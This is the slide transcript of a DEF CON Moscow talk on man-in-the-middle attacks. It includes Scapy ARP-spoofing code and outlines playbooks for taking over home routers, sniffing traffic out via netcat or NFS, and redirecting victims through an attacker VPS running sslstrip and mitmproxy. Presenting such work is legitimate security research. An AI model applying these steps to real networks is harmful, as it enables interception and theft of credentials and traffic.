defcon moscow #0x0a - oleg kupreev "uncommon mitm in uncommon conditions"

59

Upload: defcon-moscow

Post on 08-Feb-2017

2.656 views

Category:

Technology


5 download

TRANSCRIPT

Page 1: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"
Page 2: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Uncommon MiTM in uncommon conditions

Page 3: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

00 WHOAMI• @090h, [email protected], keybase.io/090h • ZN HW Village organizer [email protected] • 802.11 pwner, SDR/RF enthusiast • embedded reverser (for PWN/DIY)• JBFC/DC7499 member• researcher at hlsec.ru • pwning telecommunications since 2002• …was doing MITM 20 years ago 8)

Page 4: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

01 INTRO• XXI century is communications century• When I was a boy we counted in Pentiums 8)1993 Pentium 66Mhz – 2000 Pentium 4 1400MHz• Nowadays we count in G and still use Pentium, but 4G is

used and 5G in progress• DialUp 9600 FIDO – FTTH 100Mb Internet• Nearest future: 5G + IPv6 + IoE• Security of communications evolving slooooooooooowly.

SS7 invented in 1975, kicking ass nowadays

Page 5: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

02 MAN MITM • MITM = Man In The Middle• It is a type fundamental communication attacks• Subtypes: active, passive• IRL: passive MITM = sniff, active MITM = MITM• Also has a name….

Page 6: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"
Page 7: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"
Page 8: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Alice, Bob and Eve…

Page 9: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

.. and sometimes Charlie

Page 10: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

.. and Mallory aka Trudy

Page 11: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Implementation• Fundamental => data channel independent • Data channels:• Ethernet• USB• UART• SPI• RFID• NFC• WiFi• GSM

Page 12: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

ETHERNET EVE

Page 13: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

MY FIRST SNIFFER EVE

Page 14: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

ALICE LOOKED AWSOME THEESE DAYS

Page 15: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

NFC EVE

Page 16: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Short summary• Technology changes – MiTM changes. Hackers should be adaptive.• Security of telecommunications is like in 90’s• MiTM world is much more bigger than most hacker think• Study fundamental sciences, to be able to hack at FUNdaMENTAL

layer!

Page 17: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

I LIKE TO MITM IT MITM IT

Page 18: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

MITM I HAVE KNOWN AND LOVED• LAN based MITM• WAN based MITM• Rogue AP MITM (KAMA/MANA/HostapdWPE)• MITM over VPN (L2TP, PPTP)• Hybrid MITM

Page 19: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

MITM anatomy• ARP/DHCP/IPv6/RogueAP/SOME_ATTACK to become MALLORY • PLAiN_TEXT_PROTO => SNIFF FOR LOOT + INJECT EViL• HTTP + BEEF hook.js => MITB = MAN_IN_THE_BROWSER• HTTP + BDFProxy => SHELLZ• SSL + PROTO => (SSLSPLIT || SSLSTRiP) => PROTO• SSL + PROTO => (HEARTBLEED || POODLE) => PWN• LOOT => cookies, credentials, photos, locations• Custom sniffers/injectors/sploits for protocols/apps/vulns• Example: SMB/NTLM relays

Page 20: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

THAT’S WHY PRACTICS RULE!

Page 21: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Cooking MITM by ARP cache poison attack

Page 22: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Practice with Scapy

Page 23: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

ARP attackssend( Ether(dst=clientMAC)/ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 ) # half duplex

send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) /ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 ) # ARP spoofing in VLANS

Page 24: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Meanwhile in real world

Page 25: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Common MITM after ARP poison

Page 26: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

IRL: WTF IS GOING ON?

Page 27: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

SOME ATTACK?MAYBE PWN THE

ROUTER?

Page 28: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

PixieWPS + admin:admin @ web interface

Page 29: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Shodan + device-pharmer.py pwnage

Page 30: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

We’ve got root! What to do next?• Backup configuration• Get shell• Research firmware availabilities• Have fun

Page 31: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Backup configuration

Page 32: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Enable telnet access

Page 33: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Enable DynDNS if white IP

Page 34: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Enable syslog to rsyslogd @ VPS

Page 35: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Use Guest WiFi as tiny KARMA

Page 36: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Separate SSID, IP mask = comfort

Page 37: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Install plugins

Page 38: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Enable PPTP VPN

Page 39: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Install and use tcpdump in firmware

Page 40: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

BPF 4 YOU

Page 41: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Set DNS to your EvilDNS with dnschef

Page 42: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Passive MITM aka EVE at router• tcpdump • NFS mount and/or netcat • Write pcap file to share/pipe with tcpdump

Page 43: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Eve on router

Page 44: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Mallory on router• Set DNS to VPS• Install tcpdump, sslsplit, sslstrip• NFS mount/netcat• Write pcap file to share/pipe with tcpdump

Page 45: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Mallory on router

Page 46: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Pros and consPros:• Not so hard to doCons• Router is rebooted by watchdog or users• MITM is sloooooooooow cause of high temp of CPU• Not so many routers have such reach features• VPS IP disclosure during MITM

Page 47: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

WAN MITM TO VPS

Page 48: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

WAN MITM ALGO

• Telnet to router• Run mitmproxy in transparent mode on VPS• DNAT port 80 to VPS_IP:8080

Page 49: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Router requirements • telnet/ssh/rce/cmd inj• iptables

Page 50: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

WAN based MITM

Page 51: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Pros and consPros:• Not so hard to doCons• Oworks for HTTP traffic• Can’t distinguish clients by ip• VPS IP disclosure during MITM

Page 52: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

HARDCORE MODE ONPPTP based MITM

Page 53: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

PPTP MITM ideas• MiTM contains of 2 parts for router and VPS• All active attacks are working on VPS• Router is used for forwarding and routing• pwner is pwning

Page 54: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Router requirements • PPTP VPN server in firmware• iptables• telnet/ssh/rce/cmd inj

Page 55: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

VPS requirements • Linux,• pptp• iptables• sslstrip,sslsplit, tcpdump, mitmproxy

Page 56: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

PPTP MITM ALGO• Connect from VPS to PPTP VPN• Get ppp0 interface IP• Launch MITM kit on ppp0 (sslsplit, sslstrip, iptavleforwarding)• Telnet to router• Add ISP gateway to route map• Set VPS ppp0 IP as default gateway• PWN’em all

Page 57: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

PPTP Server on router + Mallory on VPS

Page 58: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"

Pros and consPros:• FULL MITM• No IP disclosureCons• Router looses connection to Internet if PPTP connection is down